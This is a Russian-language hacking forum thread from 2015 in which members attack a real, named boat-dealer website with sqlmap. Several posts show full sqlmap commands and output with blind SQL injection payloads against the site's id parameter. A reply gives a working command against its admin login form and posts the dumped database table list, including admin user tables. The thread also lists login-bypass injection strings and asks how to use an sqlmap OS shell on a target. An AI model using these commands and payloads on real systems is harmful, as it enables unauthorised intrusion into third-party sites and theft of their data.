ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

22.06.2015, 20:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 54593
Репутация:
0
|
|
Объясните, пожалуйста, почему так?
Почему "5063" и "tviX"?
|
|
|
|

22.06.2015, 20:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
|
|
|
|

22.06.2015, 21:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от Muracha
Muracha said:
↑
Объясните, пожалуйста, почему так?
Почему "5063" и "tviX"?
это sqlmap так выдает.
у вас фильтр на SELECT, и не в запросе в базу, а в POST/GET/COOKIE запросах. подобрать вектор вряд ли удастся, SELECT нужен везде.
|
|
|

22.06.2015, 22:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 54593
Репутация:
0
|
|
Последний раз я этим занимался лет 7 назад. По необходимости. Потом забросил.
Пришлось вернуться и столько много всего..вектора, новые методы атак. Новые приложения.
Все руками делал, а сейчас с помощью программы вытаскивать данные не составляет проблемы.
Все так упрощенно и просто.
В целом, я разобрался с этим.
Но вопрос с админкой - остался открытым.
Как обойти фильтрацию, если "Admin' --" не принимает? и тому подобное.
|
|
|
|

23.06.2015, 10:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 54593
Репутация:
0
|
|
Не могу выдернуть список таблиц.
Запрос стандартный
root@localhost:~# sqlmap -u " http://www.kazanboats.ru/index.php?id=59" --tables -D etyle2_kazboats
и такой
root@localhost:~# sqlmap -u " http://www.kazanboats.ru/index.php?id=59" --tables -D --no-cast etyle2_kazboats
Программа перебирает таблицы из словаря и пишет, что они не найдены.
Неужели оттого, что фильтруется select?
Код:
Code:
root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D --no-cast etyle2_kazboats
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:36:54
[09:36:55] [INFO] resuming back-end DBMS 'mysql'
[09:36:55] [INFO] testing connection to the target URL
[09:36:55] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=59' AND 2198=2198 AND 'naaT'='naaT
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=59' AND SLEEP(5) AND 'GtmX'='GtmX
---
[09:36:55] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[09:36:55] [INFO] fetching tables for database: '--no-cast'
[09:36:55] [INFO] fetching number of tables for database '--no-cast'
[09:36:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:55] [INFO] retrieved:
[09:36:56] [WARNING] time-based comparison requires larger statistical model, please wait...........................
[09:37:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[09:37:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:37:07] [WARNING] unable to retrieve the number of tables for database '--no-cast'
[09:37:07] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[09:37:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.kazanboats.ru'
[*] shutting down at 09:37:11
|
|
|
|

23.06.2015, 11:18
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от Muracha
Muracha said:
↑
Не могу выдернуть список таблиц.
Запрос стандартный
root@localhost:~# sqlmap -u "
http://www.kazanboats.ru/index.php?id=59
" --tables -D etyle2_kazboats
и такой
root@localhost:~# sqlmap -u "
http://www.kazanboats.ru/index.php?id=59
" --tables -D --no-cast etyle2_kazboats
Программа перебирает таблицы из словаря и пишет, что они не найдены.
Неужели оттого, что фильтруется select?
Код:
Code:
root@localhost:~# sqlmap -u "http://www.kazanboats.ru/index.php?id=59" --tables -D --no-cast etyle2_kazboats
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:36:54
[09:36:55] [INFO] resuming back-end DBMS 'mysql'
[09:36:55] [INFO] testing connection to the target URL
[09:36:55] [INFO] heuristics detected web page charset 'windows-1251'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=59' AND 2198=2198 AND 'naaT'='naaT
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=59' AND SLEEP(5) AND 'GtmX'='GtmX
---
[09:36:55] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[09:36:55] [INFO] fetching tables for database: '--no-cast'
[09:36:55] [INFO] fetching number of tables for database '--no-cast'
[09:36:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:36:55] [INFO] retrieved:
[09:36:56] [WARNING] time-based comparison requires larger statistical model, please wait...........................
[09:37:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[09:37:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:37:07] [WARNING] unable to retrieve the number of tables for database '--no-cast'
[09:37:07] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[09:37:11] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.kazanboats.ru'
[*] shutting down at 09:37:11
чтобы вывести имя бд SELECT не нужен, просто database() или schema(). а для вывода таблиц через blind синтаксис только с SELECT. вы же из базы достаете информацию, куда вы без выборки? я пробовал обойти - не выходит
|
|
|

23.06.2015, 11:49
|
|
Guest
Сообщений: n/a
Провел на форуме: 54593
Репутация:
0
|
|
Понял. Спасибо большое.
Тогда можно ли при помощи sqlmap выдернуть или авторизоваться через http://www.kazanboats.ru/admin/login.php?
Комбинация admin' : " or 1=1/* ' or 1=1--,
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Почему-то не проходят.
Это связанно с фильтрацией или с неправильно составленным запросом?
|
|
|
|

23.06.2015, 12:09
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
Сообщение от Muracha
Muracha said:
↑
Понял. Спасибо большое.
Тогда можно ли при помощи sqlmap выдернуть или авторизоваться
Да
Код:
Code:
-u "http://www.kazanboats.ru/admin/login.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
Database: etyle2_kazboats
[25 tables]
+-------------------------+
| kboats_adm_groups |
| kboats_adm_log |
| kboats_adm_users |
| kboats_foto |
| kboats_foto_category |
| kboats_guestbook |
| kboats_guestbook_conf |
| kboats_guestbook_golos |
| kboats_news |
| kboats_news_banner |
| kboats_news_cat |
| kboats_news_comments |
| kboats_news_conf |
| kboats_news_users |
| kboats_site_banner |
| kboats_site_content |
| kboats_site_menu |
| kboats_site_modules |
| kboats_site_option |
| kboats_stock |
| kboats_stock_brands |
| kboats_stock_cat_option |
| kboats_stock_category |
| ksz_admin_menu |
| ksz_info |
+-------------------------+
|
|
|
|

23.06.2015, 14:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 5818
Репутация:
0
|
|
при запуске sqlmap с параметром --os-shell
выдает
[06:35:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
как дальше действовать чтоб получить доступ, какие команды существуют?
права на запись есть
|
|
|
|

23.06.2015, 15:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 1105
Репутация:
0
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|